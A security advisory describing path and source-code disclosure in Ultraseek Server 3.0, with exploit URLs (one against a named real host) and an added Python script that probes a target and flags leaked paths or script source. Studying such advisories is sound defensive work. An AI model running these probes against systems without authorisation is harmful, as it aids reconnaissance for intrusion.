
Ultraseek Directory Traversal Vulnerability



Vulnerability

    Ultraseek

Affected

    Ultraseek Server 3.0

Description

    The following is based on CHINANSL Security Advisory CSA-200012.
    The CHINANSL security team found a security problem in Ultraseek
    Server 3.0.  A malicious user can obtain the absolute path where
    Ultraseek Server is installed and the source code of its add-on
    scripts.

    Ultraseek Server's built-in interpreter interprets server-side
    script files and runs the corresponding functions, but the server
    mishandles certain requests for those script files, so their raw
    contents are returned instead of being executed.

    (1) absolute path disclosure (no command is executed; the original
        advisory mislabels this step as "run arbitrary command"):

        http://target:8765/null.html

        Because null.html does not exist, the error response Ultraseek
        Server returns includes the absolute path where Ultraseek Server
        is installed, along with other server information.

    (2) the same bug also discloses the content of source code files.
        Requesting a script file with a trailing slash:

        http://target:8765/index.html/

    makes Ultraseek Server return the raw content of index.html (and,
    by the same method, other server-side source files used by Ultraseek
    Server) instead of interpreting it.

    Sample:

        http://www.sun.com.cn:8765/index.html/
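    The two checks above, as an added example that is not part of the
    CHINANSL advisory or of Ultraseek Server.  It issues the three
    requests the advisory describes (a nonexistent .html, the page, and
    the page with a trailing slash) and flags an absolute filesystem
    path in the error body or server-side script markup that appears
    only in the trailing-slash response.  The hostname, the helper
    names, the script markers, and the sample response bodies are all
    assumptions; the samples are constructed, not captured from a real
    Ultraseek Server.

```python
"""Probe the two Ultraseek Server 3.0 behaviours described in the advisory.

Added example, not CHINANSL's or Ultraseek's own code. The advisory only
states that a nonexistent .html returns the install path and that
'/index.html/' returns the raw script; the exact response format is not
given, so the sample bodies below are constructed.
"""
import re
import urllib.request
from urllib.error import HTTPError

ULTRASEEK_PORT = 8765  # port used in the advisory's sample URLs

# Absolute-path patterns: Unix (/usr/local/...) and Windows (C:\...).
# The negative lookbehind keeps HTML closing tags such as </body> from matching.
ABS_PATH_RE = re.compile(
    r'(?:(?<![\w/])/(?:[\w.-]+/)+[\w.-]*|[A-Za-z]:\\(?:[\w.-]+\\)*[\w.-]*)'
)

# Assumed markers of server-side script text that a rendered page would not show.
SCRIPT_MARKERS = ("<%", "<?", "#!", "import ", "def ")


def probe_urls(host, port=ULTRASEEK_PORT, page="index.html"):
    """The three requests: a nonexistent file, the page, and the page with a trailing slash."""
    base = f"http://{host}:{port}"
    return {
        "missing": f"{base}/null.html",
        "page": f"{base}/{page}",
        "page_slash": f"{base}/{page}/",
    }


def leaked_paths(body):
    """Absolute filesystem paths found in a response body (empty list if none)."""
    return sorted(set(m.group(0) for m in ABS_PATH_RE.finditer(body)))


def trailing_slash_discloses_source(page_body, slash_body):
    """True when the trailing-slash response differs from the rendered page and
    carries script markup that the rendered page does not."""
    if page_body == slash_body:
        return False
    return any(m in slash_body and m not in page_body for m in SCRIPT_MARKERS)


def analyze(missing_body, page_body, slash_body):
    """Combine both checks into one findings dict."""
    return {
        "install_path_disclosed": leaked_paths(missing_body),
        "source_disclosed": trailing_slash_discloses_source(page_body, slash_body),
    }


def fetch(url, timeout=5):
    """GET url and return the body even for HTTP error responses (the 404 is the signal)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.read().decode("utf-8", "replace")


def check_target(host, port=ULTRASEEK_PORT, page="index.html"):
    """Live check against a host you are authorised to test."""
    urls = probe_urls(host, port, page)
    return analyze(fetch(urls["missing"]), fetch(urls["page"]), fetch(urls["page_slash"]))


# Constructed sample responses (not captured from a real Ultraseek server).
SAMPLE_MISSING = "404 Not Found: /usr/local/ultraseek/docs/null.html does not exist"
SAMPLE_PAGE = "<html><body><h1>Search</h1></body></html>"
SAMPLE_SLASH = "<html><body><h1><% title %></h1>\n#! some script\n</body></html>"


if __name__ == "__main__":
    import sys
    # Offline demonstration on the constructed samples.
    print(analyze(SAMPLE_MISSING, SAMPLE_PAGE, SAMPLE_SLASH))
    # Optional live probe: python probe.py target-host
    if len(sys.argv) > 1:
        print(check_target(sys.argv[1]))
```

    The offline run on the constructed samples reports the leaked
    install path and flags the trailing-slash response as source
    disclosure; a live run against a patched or unaffected server should
    return an empty path list and False.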

Solution

    Nothing yet.

